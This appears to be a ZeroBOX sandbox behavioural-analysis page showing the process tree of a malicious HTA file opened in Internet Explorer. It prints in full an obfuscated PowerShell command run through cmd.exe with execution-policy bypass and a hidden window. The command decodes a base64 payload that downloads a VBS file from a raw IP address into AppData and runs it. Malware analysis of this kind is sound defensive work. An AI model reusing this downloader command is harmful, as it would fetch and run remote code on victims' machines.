| ZeroBOX

Behavioral Analysis

Process tree

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\wesharelovetogethreforgetbestthingsonherefor.hta.html

    2144
    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2144 CREDAT:145409

      2252
      • cmd.exe "C:\Windows\system32\cmd.exe" "/c poWershell.exe -ex bYPass -NOp -w 1 -C dEviCEcREDENtIaLDePlOymeNT.ExE ; iex($(IEX('[system.teXT.ENcODInG]'+[ChaR]58+[CHAR]0X3a+'utF8.GEtSTrInG([sYStEm.ConvErT]'+[chAR]58+[Char]0X3a+'fROmBASE64strInG('+[CHAR]0x22+'JDlKNm5pICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUkRFZkluaXRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZW1UbGUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExrTixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkVNZFZxWCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHl4bE1ZcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmdreGlVelpKaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieVVLIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ3ZkYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOUo2bmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDkuMjQ4LjE0NC4xODQveGFtcHAva2Jjby9ncmVhdGRheXNyZXR1cm5iYWNrZG9udHdvcnJ5Zm9ybG92ZXN0b3lvdS5naWYiLCIkRU5WOkFQUERBVEFcZ3JlYXRkYXlzcmV0dXJuYmFja2RvbnR3b3JyeWZvcmxvdmVzdG95by52YnMiLDAsMCk7U1RBcnQtc0xlRXAoMyk7SW5WT2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxncmVhdGRheXNyZXR1cm5iYWNrZG9udHdvcnJ5Zm9ybG92ZXN0b3lvLnZicyI='+[cHaR]34+'))')))"

        1692
        • powershell.exe poWershell.exe -ex bYPass -NOp -w 1 -C dEviCEcREDENtIaLDePlOymeNT.ExE ; iex($(IEX('[system.teXT.ENcODInG]'+[ChaR]58+[CHAR]0X3a+'utF8.GEtSTrInG([sYStEm.ConvErT]'+[chAR]58+[Char]0X3a+'fROmBASE64strInG('+[CHAR]0x22+'JDlKNm5pICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUkRFZkluaXRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZW1UbGUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExrTixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkVNZFZxWCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHl4bE1ZcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmdreGlVelpKaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieVVLIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ3ZkYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOUo2bmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDkuMjQ4LjE0NC4xODQveGFtcHAva2Jjby9ncmVhdGRheXNyZXR1cm5iYWNrZG9udHdvcnJ5Zm9ybG92ZXN0b3lvdS5naWYiLCIkRU5WOkFQUERBVEFcZ3JlYXRkYXlzcmV0dXJuYmFja2RvbnR3b3JyeWZvcmxvdmVzdG95by52YnMiLDAsMCk7U1RBcnQtc0xlRXAoMyk7SW5WT2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxncmVhdGRheXNyZXR1cm5iYWNrZG9udHdvcnJ5Zm9ybG92ZXN0b3lvLnZicyI='+[cHaR]34+'))')))"

          2548

Process contents

No process loaded Click on a process in the tree above to load its data.